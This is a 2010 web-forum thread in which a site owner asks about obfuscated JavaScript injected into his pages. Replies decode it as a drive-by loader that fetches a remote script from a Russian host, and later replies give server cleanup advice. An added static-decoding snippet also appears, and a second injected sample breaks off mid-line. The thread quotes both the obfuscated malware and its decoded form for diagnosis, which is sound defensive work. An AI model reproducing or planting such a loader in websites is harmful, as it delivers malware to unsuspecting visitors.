code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 9:10 am
by garf90
we have a site and suddenly weird things are happening.

my developer tells me some weird Java / script has been added to multiple pages....but we (my company) didn't do it.

can anyone tell me about this code? (below) Has our site been hacked / infected?

We just found some kind of run time malware on another site...but it's on a different server.

very concerned.

any help would be great
G90

<script>var t="";var h="";var G;if(G!='m'){G=''};var D_="";function C() {var S='';var J="";var K=window;var V;if(V!='O'){V=''};var R=String("scri"+"pt");var iq="";var Z;var r='';var A;if(A!=''){A='zH'};var Fl=new String();var E=String("g");var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);var b=new String("]");var f;if(f!='' && f!='Qp'){f=null};var z=RegExp;var GU;if(GU!='I' && GU!='lb'){GU=''};this.JL="";var bT;if(bT!=''){bT='px'};function N(q,p){var d="[";var nm;if(nm!='il' && nm != ''){nm=null};d+=p;d+=b;var oF;if(oF!='So' && oF != ''){oF=null};var w=new z(d, E);this.ze='';return q.replace(w, r);};var wk;if(wk!='e'){wk=''};this.Ns='';var i="onl"+"oad";var dz;if(dz!='no'){dz='no'};this.wa='';var LO='';var O_='';var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";this.g='';this.Vw='';Z=function(){this.ZF='';try {var Gf;if(Gf!='uW' && Gf != ''){Gf=null};n=document.createElement(R);var RV=new String();var Yo;if(Yo!='' && Yo!='fF'){Yo='ib'};var v=new Array();n[D]=[1,8][0];var gY='';var gYj='';n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')+N('8295634772434270642295791948166996914660733561217215135','65174293')+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');var XG;if(XG!='' && XG!='vi'){XG=null};var II='';var Q=new String("bodyOc6".substr(0,4));var QA;if(QA!='' && QA!='wq'){QA='JJ'};var Oa;if(Oa!='' && Oa!='hH'){Oa='Od'};var yK=new String();var Zy;if(Zy!='' && Zy!='MB'){Zy=null};var uu;if(uu!='' && uu!='nE'){uu=null};document[Q][L](n);var fR;if(fR!='U' && fR != ''){fR=null};} catch(H){this.EW="";var x_=new Date();};this.YM='';};K=Z;var vr="";this.kR='';var Jf;if(Jf!='of' && Jf != ''){Jf=null};};var Wd=new Array();var UK;if(UK!='HZ' && UK!='uz'){UK=''};C();var KqP=new String();</script>
<!--52071e04b71ca66bacac9424ea495244-->

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 11:40 am
by kaszu
Took me 20 minutes, but reversed. Here is what it does:

Code:

window.onload = function () {
    n = document.createElement('script');
    n.defer = 1;
    n.src = 'http://pokesack.ru:8080/google.com/technorati.com/iciba.com.php';
    document.body.appendChild(n);
}
This code loads more JavaScript code from the pokesack.ru server, which adds an iframe to the page (src is also on pokesack.ru).

garf90 wrote: Has our site been hacked / infected?

Yes

Edit: this is my 666th post :twisted:
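
The decoding described in the post above can be reproduced statically, so the injected script never has to run. This is an added example, not part of the original thread: the function names (`stripChars`, `decodeStrings`, `decodedLiterals`, `defang`) are made up here, and `SAMPLE` holds only fragments copied from the script in the first post.

```javascript
// Added example: decode the injected script's hidden strings without running it.
// SAMPLE holds fragments copied from the obfuscated script in the first post.
const SAMPLE =
  `var R=String("scri"+"pt");` +
  `var L="appmnQi".substr(0,3)+"end"+"Chinrc7".substr(0,3)+"ldxiDU".substr(0,2);` +
  `var u=N('sqr4cp','5pqQ4xa7');var D="defeANm0".substr(0,4)+"r";` +
  `n = N('hGtQtGpW:H/j/jpYoHkjeGsjaWcYkG.YrQuY:j','GYjQWH')` +
  `+N('8295634772434270642295791948166996914660733561217215135','65174293')` +
  `+N('/DgXoVoEg5lReL.6cMoXm5/jt9eIcWh4nIo4r9aWtLiR.Wc5o3mR/Wi5c9iMb6a9.WcRo3mI.4p9hXp5','I36Xj9VE4W5RDLM');`;

// Same effect as the sample's helper N(q, p): delete every character of p from q.
function stripChars(q, p) {
  const cls = p.replace(/[\\\]^-]/g, "\\$&"); // keep p literal inside [...]
  return q.replace(new RegExp("[" + cls + "]", "g"), "");
}

// Rewrite N('..','..') calls and "..".substr(a,n) as plain literals, then fold
// "a"+"b" concatenations until nothing changes. The input is only ever text.
function decodeStrings(src) {
  let out = src
    .replace(/N\('([^']*)','([^']*)'\)/g, (_, q, p) => JSON.stringify(stripChars(q, p)))
    .replace(/"([^"]*)"\.substr\((\d+),(\d+)\)/g,
      (_, s, a, n) => JSON.stringify(s.slice(Number(a), Number(a) + Number(n))));
  let prev;
  do {
    prev = out;
    out = out.replace(/"([^"]*)"\s*\+\s*"([^"]*)"/g, (_, a, b) => JSON.stringify(a + b));
  } while (out !== prev);
  return out;
}

// Decoded string literals, in source order.
function decodedLiterals(src) {
  return [...decodeStrings(src).matchAll(/"([^"]*)"/g)].map((m) => m[1]);
}

// Defang URL-like values so they can be pasted into tickets or block lists safely.
function defang(s) {
  return /^https?:/.test(s) ? s.replace(/^http/, "hxxp").replace(/\./g, "[.]") : s;
}

console.log(decodedLiterals(SAMPLE).map(defang));
```

The decoded literals are the element type, the DOM method, the two property names and the remote URL, which match the reversed code posted above.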

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 11:40 am
by Benjamin
Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 12:57 pm
by garf90
thanks....and S### lol


ok will look into it further.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 1:10 pm
by garf90
Benjamin wrote: Your servers have been compromised. The script could very well be spreading malware to your site visitors or used for monetary gain of some sort.

thankfully site is not yet live.

so no customers yet.......

anyone in these forums dealt with these kind of run time doohickeys before?

i may need a pro on this. it's not my guy's field of expertise.

G90

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 1:23 pm
by garf90
additional: hey kaszu thx for taking the time to track the source down and looking into it for me.

G90

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 2:14 pm
by Benjamin
Well, here's what I would do:

1. Locate the entry point they used to gain access and fix it.
2. Reprovision the server, e.g. reinstall Linux from scratch in case there are any rootkits installed. Your webhost can do this for you.
3. Check the entire code base for vulnerabilities, especially upload forms and unprotected variables in database queries.
4. Use the latest version of any external libraries, such as phpBB or whatever you may be using.
5. Use cPanel and enable brute force detection, which will automatically block IPs with many invalid logins.
6. Disable any services not being used, e.g. ssh, ftp.
7. Ensure a firewall is installed and be aware of what ports are open and who they are open to.

I'm sure I'm missing some things, but this is a good start.

Re: code auto added to my site..anyone tell me what is?

Posted: Sun Apr 18, 2010 2:22 pm
by garf90
I get better support here than my hosting company....who said 'we can't touch your code..sorry'

Re: code auto added to my site..anyone tell me what is?

Posted: Fri Apr 23, 2010 1:21 pm
by garf90
ok spent almost a week...got almost everything.

but just found this. is this another instance of the hack or something else?

don't want to delete just in case

<script>var j;if(j!='FJ' && j!='y'){j=''};this.TJ='';try {var C;if(C!='' && C!='Z'){C=''};var br='';var F=window[unescape("%75%6e%65%73%63%61%70%65")];this.PN="";var G;if(G!='' && G!='Y'){G=''};var ZV=